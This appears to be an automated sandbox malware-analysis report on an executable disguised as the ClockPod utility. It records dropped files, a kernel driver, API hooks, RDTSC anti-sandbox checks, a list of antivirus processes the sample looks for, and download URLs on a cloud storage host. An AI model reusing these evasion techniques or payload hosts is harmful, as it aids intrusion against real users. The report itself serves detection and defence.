Source: 149876985-734579485.05.exeString found in binary or memory: R(&M)I/O CRC errors(C7)Uncorrectable Sectors(C6)Reallocation sectors(C4)Temperature%dCTotal LBAs ReadTotal LBAs WrittenWrite Error RateCurrent Pending SectorsLoad/Unload Cycle CountUnsafe Shutdown CountG-sense Error RateCommand Timeout CountReported Uncorrectable ErrorsEnd-to-End errorProgram Fail CountSoft Read Error RatePower Cycle CountRecalibration RetriesSpin Retry CountPower-On HoursSeek Time PerformanceSeek Error RateReallocated Sectors CountStart/Stop CountSpin Up TimeThroughput PerformanceRead Error Rate(Threshold)Sto&p Mail checkE&xit&AboutSuppor&tSend &messenger&Send ClockPodHidden &Window ListWindow &ListThis Window &Info.&Battery check&CarendarRel&oad&R click key&M click key&L click key&Dodge pointer&Window Position&Font&GeneralC&ustomizecheckDisable glassEnable glassTransparentThroughSet &FontEna&ble&Top most&HideD&estroy&Disable 'Close'&CloseMove on DesktopMa&ximizeMi&nimize&Restore&Size&Movecheck\commandopen\shell.txtDwmEnableBlurBehindWindowLISTBOX%d:%c%sClockPod Ver2.73 (c)TORO 2024<DoDisconnect:%s/%s>Disconnect%s/%s
Source: 149876985-734579485.05.exeString found in binary or memory: R(&M)I/O CRC errors(C7)Uncorrectable Sectors(C6)Reallocation sectors(C4)Temperature%dCTotal LBAs ReadTotal LBAs WrittenWrite Error RateCurrent Pending SectorsLoad/Unload Cycle CountUnsafe Shutdown CountG-sense Error RateCommand Timeout CountReported Uncorrectable ErrorsEnd-to-End errorProgram Fail CountSoft Read Error RatePower Cycle CountRecalibration RetriesSpin Retry CountPower-On HoursSeek Time PerformanceSeek Error RateReallocated Sectors CountStart/Stop CountSpin Up TimeThroughput PerformanceRead Error Rate(Threshold)Sto&p Mail checkE&xit&AboutSuppor&tSend &messenger&Send ClockPodHidden &Window ListWindow &ListThis Window &Info.&Battery check&CarendarRel&oad&R click key&M click key&L click key&Dodge pointer&Window Position&Font&GeneralC&ustomizecheckDisable glassEnable glassTransparentThroughSet &FontEna&ble&Top most&HideD&estroy&Disable 'Close'&CloseMove on DesktopMa&ximizeMi&nimize&Restore&Size&Movecheck\commandopen\shell.txtDwmEnableBlurBehindWindowLISTBOX%d:%c%sClockPod Ver2.73 (c)TORO 2024<DoDisconnect:%s/%s>Disconnect%s/%s
Source: C:\Users\user\Desktop\149876985-734579485.05.exeFile read: C:\Users\user\Desktop\149876985-734579485.05.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\149876985-734579485.05.exe "C:\Users\user\Desktop\149876985-734579485.05.exe"
Source: unknownProcess created: C:\Users\user\Documents\S1JCyi.exe C:\Users\user\Documents\S1JCyi.exe "?Y5?(
Source: unknownProcess created: C:\Users\user\Documents\S1JCyi.exe C:\Users\user\Documents\S1JCyi.exe "?Y5?(
Source: unknownProcess created: C:\Users\user\Documents\S1JCyi.exe C:\Users\user\Documents\S1JCyi.exe "?Y5?(
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: pid.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: hid.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Users\user\Documents\S1JCyi.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Documents\S1JCyi.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\S1JCyi.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Documents\S1JCyi.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\S1JCyi.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Documents\S1JCyi.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\S1JCyi.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: 149876985-734579485.05.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: 149876985-734579485.05.exeStatic file information: File size 30939136 > 1048576
Source: 149876985-734579485.05.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x1d5ae00
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: 149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmp, S1JCyi.exe, 00000005.00000000.2725795843.0000000140014000.00000002.00000001.01000000.00000008.sdmp, S1JCyi.exe, 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmp, S1JCyi.exe, 00000006.00000002.2745881061.0000000140014000.00000002.00000001.01000000.00000008.sdmp, S1JCyi.exe, 00000006.00000000.2735513195.0000000140014000.00000002.00000001.01000000.00000008.sdmp, S1JCyi.exe, 00000007.00000000.2845601695.0000000140014000.00000002.00000001.01000000.00000008.sdmp, S1JCyi.exe, 00000007.00000002.2946510571.0000000140014000.00000002.00000001.01000000.00000008.sdmp, S1JCyi.exe.0.dr
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_000000014000F000

Persistence and Installation Behavior

barindex
Source: C:\Users\user\Desktop\149876985-734579485.05.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Source: C:\Users\user\Desktop\149876985-734579485.05.exeFile created: C:\Users\user\Documents\S1JCyi.exeJump to dropped file
Source: C:\Users\user\Desktop\149876985-734579485.05.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Desktop\149876985-734579485.05.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Source: C:\Users\user\Desktop\149876985-734579485.05.exeFile created: C:\Users\user\Documents\S1JCyi.exeJump to dropped file
Source: C:\Users\user\Desktop\149876985-734579485.05.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,5_2_0000000140001520

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Users\user\Documents\S1JCyi.exeMemory written: PID: 2424 base: 7FFE22370008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\S1JCyi.exeMemory written: PID: 2424 base: 7FFE2220D9F0 value: E9 20 26 16 00 Jump to behavior
Source: C:\Users\user\Documents\S1JCyi.exeMemory written: PID: 1716 base: 7FFE22370008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\S1JCyi.exeMemory written: PID: 1716 base: 7FFE2220D9F0 value: E9 20 26 16 00 Jump to behavior
Source: C:\Users\user\Documents\S1JCyi.exeMemory written: PID: 2380 base: 7FFE22370008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\S1JCyi.exeMemory written: PID: 2380 base: 7FFE2220D9F0 value: E9 20 26 16 00 Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\149876985-734579485.05.exeRDTSC instruction interceptor: First address: 140001115 second address: 14000112C instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
Source: C:\Users\user\Desktop\149876985-734579485.05.exeRDTSC instruction interceptor: First address: 14000112C second address: 14000112C instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007F14C4BCDF60h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
Source: C:\Users\user\Desktop\149876985-734579485.05.exeWindow / User API: threadDelayed 655Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeDropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Documents\S1JCyi.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_5-14017
Source: C:\Users\user\Documents\S1JCyi.exeAPI coverage: 2.7 %
Source: C:\Users\user\Desktop\149876985-734579485.05.exe TID: 6456Thread sleep count: 655 > 30Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe TID: 6456Thread sleep time: -327500s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe TID: 6456Thread sleep count: 344 > 30Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe TID: 6456Thread sleep time: -172000s >= -30000sJump to behavior
Source: C:\Users\user\Documents\S1JCyi.exeLast function: Thread delayed
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_00007FFE1A48A1B8 FindFirstFileExW,5_2_00007FFE1A48A1B8
Source: 149876985-734579485.05.exe, 00000000.00000003.2589830190.0000000000614000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Documents\S1JCyi.exeAPI call chain: ExitProcess graph end nodegraph_5-14018
Source: C:\Users\user\Documents\S1JCyi.exeAPI call chain: ExitProcess graph end nodegraph_5-14362
Source: C:\Users\user\Desktop\149876985-734579485.05.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_00000001400073E0 LdrLoadDll,5_2_00000001400073E0
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0000000140007C91
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_000000014000F000
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,5_2_0000000140004630
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0000000140007C91
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00000001400106B0
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_00000001400092E0 SetUnhandledExceptionFilter,5_2_00000001400092E0
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_00007FFE1A4876E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFE1A4876E0
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_00007FFE1A481F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFE1A481F50
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_00007FFE1A482630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFE1A482630

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Documents\S1JCyi.exeNtAllocateVirtualMemory: Indirect: 0x140006FD0Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exeNtDelayExecution: Indirect: 0x1F9AD7Jump to behavior
Source: C:\Users\user\Documents\S1JCyi.exeNtProtectVirtualMemory: Indirect: 0x2B1B253Jump to behavior
Source: C:\Users\user\Documents\S1JCyi.exeNtProtectVirtualMemory: Indirect: 0x2ACB253Jump to behavior
Source: C:\Users\user\Documents\S1JCyi.exeNtProtectVirtualMemory: Indirect: 0x297B253Jump to behavior
Source: 149876985-734579485.05.exeBinary or memory string: CpodFrame*CLOCKPOD.EXEWindowsScreenSaverClass#32768HookSwitchCLOCKPOD64.DLLInitCommonControlsInitCommonControlsExCOMCTL32.DLLSysMonthCal32Shell_NotifyIconWSHELL32.DLLGetDpiForMonitorshcore.dllMonitorFromWindowControl Panel\Desktop\WindowMetricsCaptionFontGetMonitorInfoWProgmanShell_TrayWndDwmIsCompositionEnabledDwmGetColorizationColordwmapi.dll1RASHANGUP1RAS<DoDisconnect:<Connect:%s/%s><Connect:<Disconnect:UnknownUser eventCustom eventType specific eventDevice is goneAbout to removeRemoval abortedWants to remove, may failDetected a new deviceCONFIGMG privateLow disk spaceNo disk spaceVolLockUnlockFailedVolLockLockReleasedVolLockQueryUnlockVolLockLockFailedVolLockLockTakenVolLockQueryLockCONFIGMG vxdCONFIGMG api32Shell logonMonitorChangeConfigChangeCanceledConfigChangedQueryChangeConfigDevnodes changedAPPYENDAPPYBEGINh
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_00007FFE1A48FD40 cpuid 5_2_00007FFE1A48FD40
Source: C:\Users\user\Documents\S1JCyi.exeCode function: GetLocaleInfoA,5_2_000000014000F370
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,5_2_000000014000A370
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,5_2_0000000140005A70
Source: S1JCyi.exe, 00000005.00000002.2732369210.0000000002898000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000006.00000002.2744787619.00000000028E8000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000007.00000002.2945943384.0000000002748000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: kxetray.exe
Source: S1JCyi.exe, 00000005.00000002.2732369210.0000000002898000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000006.00000002.2744787619.00000000028E8000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000007.00000002.2945943384.0000000002748000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: vsserv.exe
Source: S1JCyi.exe, 00000005.00000002.2732369210.0000000002898000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000006.00000002.2744787619.00000000028E8000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000007.00000002.2945943384.0000000002748000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avcenter.exe
Source: S1JCyi.exe, 00000005.00000002.2732369210.0000000002898000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000006.00000002.2744787619.00000000028E8000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000007.00000002.2945943384.0000000002748000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: KSafeTray.exe
Source: S1JCyi.exe, 00000005.00000002.2732369210.0000000002898000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000006.00000002.2744787619.00000000028E8000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000007.00000002.2945943384.0000000002748000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avp.exe
Source: S1JCyi.exe, 00000005.00000002.2732369210.0000000002898000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000006.00000002.2744787619.00000000028E8000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000007.00000002.2945943384.0000000002748000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360Safe.exe
Source: S1JCyi.exe, 00000005.00000002.2732369210.0000000002898000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000006.00000002.2744787619.00000000028E8000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000007.00000002.2945943384.0000000002748000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe
Source: S1JCyi.exe, 00000005.00000002.2732369210.0000000002898000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000006.00000002.2744787619.00000000028E8000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000007.00000002.2945943384.0000000002748000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: rtvscan.exe
Source: S1JCyi.exe, 00000005.00000002.2732369210.0000000002898000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000006.00000002.2744787619.00000000028E8000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000007.00000002.2945943384.0000000002748000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: ashDisp.exe
Source: S1JCyi.exe, 00000005.00000002.2732369210.0000000002898000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000006.00000002.2744787619.00000000028E8000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000007.00000002.2945943384.0000000002748000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
Source: S1JCyi.exe, 00000005.00000002.2732369210.0000000002898000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000006.00000002.2744787619.00000000028E8000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000007.00000002.2945943384.0000000002748000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avgwdsvc.exe
Source: S1JCyi.exe, 00000005.00000002.2732369210.0000000002898000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000006.00000002.2744787619.00000000028E8000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000007.00000002.2945943384.0000000002748000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: AYAgent.aye
Source: S1JCyi.exe, 00000005.00000002.2732369210.0000000002898000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000006.00000002.2744787619.00000000028E8000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000007.00000002.2945943384.0000000002748000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: QUHLPSVC.EXE
Source: S1JCyi.exe, 00000005.00000002.2732369210.0000000002898000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000006.00000002.2744787619.00000000028E8000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000007.00000002.2945943384.0000000002748000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: RavMonD.exe
Source: S1JCyi.exe, 00000005.00000002.2732369210.0000000002898000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000006.00000002.2744787619.00000000028E8000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000007.00000002.2945943384.0000000002748000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
Source: S1JCyi.exe, 00000005.00000002.2732369210.0000000002898000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000006.00000002.2744787619.00000000028E8000.00000002.00001000.00020000.00000000.sdmp, S1JCyi.exe, 00000007.00000002.2945943384.0000000002748000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: K7TSecurity.exe
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,5_2_00000001400042B0
Source: C:\Users\user\Documents\S1JCyi.exeCode function: 5_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,5_2_0000000140003F80
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter
24
Windows Service
1
Access Token Manipulation
31
Masquerading
1
Credential API Hooking
1
System Time Discovery
Remote Services1
Credential API Hooking
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts12
Service Execution
1
DLL Side-Loading
24
Windows Service
1
Virtualization/Sandbox Evasion
LSASS Memory131
Security Software Discovery
Remote Desktop Protocol1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
Native API
Logon Script (Windows)2
Process Injection
1
Access Token Manipulation
Security Account Manager1
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
Abuse Elevation Control Mechanism
2
Process Injection
NTDS2
Process Discovery
Distributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
DLL Side-Loading
1
Abuse Elevation Control Mechanism
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Obfuscated Files or Information
Cached Domain Credentials1
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading
DCSync123
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
149876985-734579485.05.exe7%VirustotalBrowse
149876985-734579485.05.exe3%ReversingLabs
SourceDetectionScannerLabelLink
C:\Users\user\Documents\S1JCyi.exe0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://khec3y.oss-cn-beijing.aliyuncs.com/a.gif0%Avira URL Cloudsafe
https://khec3y.oss-cn-beijing.aliyuncs.com/a.gifhttps://khec3y.oss-cn-beijing.aliyuncs.com/b.gifhttp0%Avira URL Cloudsafe
https://khec3y.oss-cn-beijing.aliyuncs.com/b.gifB0%Avira URL Cloudsafe
https://khec3y.oss-cn-beijing.aliyuncs.com/s.jpg0%Avira URL Cloudsafe
https://khec3y.oss-cn-beijing.aliyuncs.com/a.gif%0%Avira URL Cloudsafe
https://khec3y.oss-cn-beijing.aliyuncs.com/7-2476756634-10020%Avira URL Cloudsafe
https://khec3y.oss-cn-beijing.aliyuncs.com/i0%Avira URL Cloudsafe
https://khec3y.oss-cn-beijing.aliyuncs.com/u0%Avira URL Cloudsafe
https://khec3y.oss-cn-beijing.aliyuncs.com/d.gif0%Avira URL Cloudsafe
https://khec3y.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/0%Avira URL Cloudsafe
http://toro.d.dooo.jp/report/receive.cgi?exe=ClockPod0%Avira URL Cloudsafe
http://toro.d.dooo.jp/index.html)k00%Avira URL Cloudsafe
https://khec3y.oss-cn-beijing.aliyuncs.com/Jc0%Avira URL Cloudsafe
https://khec3y.oss-cn-beijing.aliyuncs.com/i.dat0%Avira URL Cloudsafe
https://khec3y.oss-cn-beijing.aliyuncs.com/a.gif~0%Avira URL Cloudsafe
https://khec3y.oss-cn-beijing.aliyuncs.com/b.gif0%Avira URL Cloudsafe
https://khec3y.oss-cn-beijing.aliyuncs.com/0%Avira URL Cloudsafe
https://khec3y.oss-cn-beijing.aliyuncs.com/b.gifj0%Avira URL Cloudsafe
https://khec3y.oss-cn-beijing.aliyuncs.com/s.dat0%Avira URL Cloudsafe
https://khec3y.oss-cn-beijing.aliyuncs.com/a.gifR0%Avira URL Cloudsafe
http://toro.d.dooo.jp/index.htmlTORO0%Avira URL Cloudsafe
https://khec3y.oss-cn-beijing.aliyuncs.com/c.gif0%Avira URL Cloudsafe
https://khec3y.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-10020%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com
118.178.60.9
truefalse
    high
    khec3y.oss-cn-beijing.aliyuncs.com
    59.110.190.21
    truefalse
      unknown
      22mm.oss-cn-hangzhou.aliyuncs.com
      unknown
      unknownfalse
        high
        NameMaliciousAntivirus DetectionReputation
        https://khec3y.oss-cn-beijing.aliyuncs.com/a.giffalse
        • Avira URL Cloud: safe
        unknown
        https://khec3y.oss-cn-beijing.aliyuncs.com/s.jpgfalse
        • Avira URL Cloud: safe
        unknown
        https://khec3y.oss-cn-beijing.aliyuncs.com/d.giffalse
        • Avira URL Cloud: safe
        unknown
        https://khec3y.oss-cn-beijing.aliyuncs.com/i.datfalse
